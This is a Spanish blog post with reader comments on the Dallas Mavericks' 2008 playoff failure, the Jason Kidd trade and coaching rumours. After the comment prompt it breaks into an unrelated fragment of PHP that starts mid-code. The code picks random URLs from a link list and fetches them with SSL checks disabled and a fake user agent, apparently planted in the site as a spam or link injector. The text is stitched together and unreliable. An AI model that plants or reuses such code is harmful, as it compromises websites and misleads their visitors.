Malos tiempos para la lírica en Dallas

30 de April de 2008 por TheDeerHunter

Cómo es esta liga y este deporte. Un equipo increíble, jugando fantásticamente bien durante muchos años, buscando un estilo de juego propio, ofensivo, atractivo, plagado de jugadores extraordinarios… Pasa en dos años de tener ganado un anillo (y perderlo de forma súbita), de tener un MVP de la liga y un campeonato de conferencia (y palmar de forma súbita en primera ronda), de ser favorito a todo con un equipazo… a ésto, un equipo descompuesto antes de tiempo, en el que parece que sobra todo el mundo menos uno.

No ha sido una cuestión de edad como en otros casos. Uno de los éxitos de Dallas Mavericks ha sido siempre una renovacion inteligente de los pilares del equipo, con incorporación paulatina de jugadores jovenes y prometedores, pero también de jugadores consagrados con experiencia y talento demostrado, siempre alrededor del crack alemán, principio y fin de lo que han sido estos últimos años y que teóricamente todavía tiene recorrido.

Han sido sólo dos golpes puntuales los que han quebrado la estructura hasta el hundimiento. La final perdida y la sorpresa del año pasado los convirtió en un grupo plano e inseguro. Mucho talento a priori, muchos nombres, pero vulnerables, que no trasmitían ningún tipo de garantías para lo que se les exije. La puntilla llegó porque tenía que llegar… era previsible un golpe de timón, pero se ha producido de forma abrupta, desesperada y obligada por las circunstancias. El traspaso de Jason Kidd podría haber sido una bendición, pero no por el precio que finalmente se tuvo que pagar gracias a inexplicables claúsulas en contratos de actores de reparto.

Una historia distinta, pero de conclusión parecida. El equipo pierde ciertos elementos clave de su personalidad en el peor momento y su juego se resiente. Jason Kidd representa una hipoteca de por vida, un último tren que pasa, una última jugada a cara o cruz… que en esta ocasión sale cruz. Al contrario de lo que cabría esperar el veterano base no logra adaptarse a la nueva filosofía que le envuelve, no logra ni siquiera alcanzar el nivel de lo que por él se ha dado ni mucho menos mejora al equipo, sino que acaso lo empeora. Lo único que logra es esa sensación del ahora o nunca que agarrota a todos, a todos menos a uno.

La última gesta llegó con la lesión de rodilla de Nowitzki. La posibilidad de no entrar y su vuelta precipitada por la necesidad. Un canto al sacrificio, con héroes y salvadores. Sin embargo, como epílogo de esta historia aparece una figura. Representa la destrucción de todo lo que rodea a Dallas, del fracaso de Jason Kidd y del megalómano proyecto de Cuban. Representa el final de una época.

Esa figura es Chris Paul.

Poco más hay que añadir.

Comenta

7 comentarios a esta entrada

  1. Dantley dice:
    #1

    Bien explicado ¡¡¡

    Lo de cara o cruz no lo veo. Veo que más que tirar una moneda, han jugado a la ruleta, un número entre 36. Con la potencia del Oeste, era muy difícil que Kidd-Harris fuese suficiente. Y han perdido a Harris que no es que sea un proyecto de figura pero sí un jugador muy sólido.

      Citar

  2. txusma dice:
    #2

    Primera victima: Avery Johnson a la calle!

      Citar

  3. aro_pasado_no_newtoniano dice:
    #3

    Bien dicho, bicho.

      Citar

  4. TheDeerHunter dice:
    #4

    Yo me niego a creer que no se pueda ganar sin juego interior dominante.

    De hecho, Dallas estuvo a punto de hacerlo con un equipo no demasiado distinto al que podría haber tenido de haber logrado el trade de Kidd a la primera.

    Y lo cierto es que, bueno, nadie pensaba que Jason Kidd no se adaptaría al estilo de juego de este equipo. Lo que veíamos mal de este movimiento era los jugadores de los que Dallas tuvo que prescindir. (no olvidemos a Diop, que era útil para Dallas… ni a Van Horn .- oOooo)

    De todos modos, estaremos de acuerdo conque éste equipo necesitaba un giro… y en cierto sentido Kidd se lo dió (me refiero a recuperar la ilusión) El problema es que Kidd ha rendido muy poquito y además han tenido la mala suerte de cruzarse con el par que más daño le podía hacer.

      Citar

  5. Viva_Dirk dice:
    #5

    A ver que entrenador ficha ahora Cuban, antes de que lo echen de Phoenix ya suena Mike D’Antoni, que la verdad es que parece una grandísima opción para una plantilla como la de Dallas….pero que ya ha fracasado con otra gran plantilla.

    Dependiendo de quien ocupe el banquillo pueden darle salida a Josh Howard e intentarlo con Dampier, aunque no tiene pinta de que cuele.

      Citar

  6. txusma dice:
    #6

    Si D’Antoni ficha a Dallas lo primero q hara sera… fichar a Nash! 😀

      Citar

  7. Viva_Dirk dice:
    #7

    Ya digo que en teoría es una muy buena plantilla para D’Antoni: un base gran base(aunque no lo halla demostrado en estos play-offs), un tirador como Terry, un alero muy atlético y una estrella capaz de tirar desde cualquier sitio, además de aleros suplentes veteranos y a Bass.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>